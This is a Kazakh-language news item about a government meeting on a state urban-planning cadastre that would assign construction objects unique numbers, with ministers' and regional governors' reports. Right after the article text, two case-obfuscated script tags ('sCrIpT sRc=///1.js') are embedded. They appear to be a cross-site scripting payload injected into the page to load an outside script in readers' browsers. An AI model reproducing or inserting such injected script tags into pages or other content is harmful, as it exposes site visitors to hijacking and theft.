ЖСН-ге ұқсас бірегей нөмір Қазақстандағы құрылыс нысандарында да пайда болады ҚР Премьер-Министрі Әлихан Смайыловтың төрағалығымен өткен Үкімет отырысында Мемлекеттік қала құрылысы кадастры жүйесін енгізу мәселесі қаралды. Аталған тақырып бойынша индустрия және инфрақұрылымдық даму министрі Қайырбек Өскенбаев, цифрлық даму, инновациялар және аэроғарыш өнеркәсібі министрі Бағдат Мусин, Атырау облысының әкімі Серік Шәпкенов және Қарағанды облысының әкімі Жеңіс Қасымбек баяндама жасады. ИИДМ басшысының хабарлауынша, Мемлекеттік қала құрылысы кадастрының автоматтандырылған жүйесі – елді мекендердің ағымдағы және жоспарланып отырған дамуы туралы ақпаратты қамтамасыз етудің негізгі құралдарының бірі. Бұл жүйе цифрлық бас жоспарларды, егжей-тегжейлі жоспарлау жобаларын, ғимараттар мен құрылыстардың орналасуы, инженерлік инфрақұрылым, көше-жол желісі, сондай-ақ абаттандыру туралы деректерді жинауды, өңдеуді және сақтауды қамтамасыз етеді. Жүйенің негізгі міндеттері: қала құрылысы кадастры деректерін толтыру және өзектендіру, халықпен бизнесті инженерлік желілер туралы өзекті ақпаратпен қамтамасыз ету, инфрақұрылымдық деректерді цифрландыру есебінен техникалық шарттарды алудың ашық процесін қалыптастыру.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.10.2022

https://ortcom.kz/kk/deyatelnost-pravitelstva/1664865051

Просмотров: 256


Пікір қосу



Деректерді қолтаңбаға қосу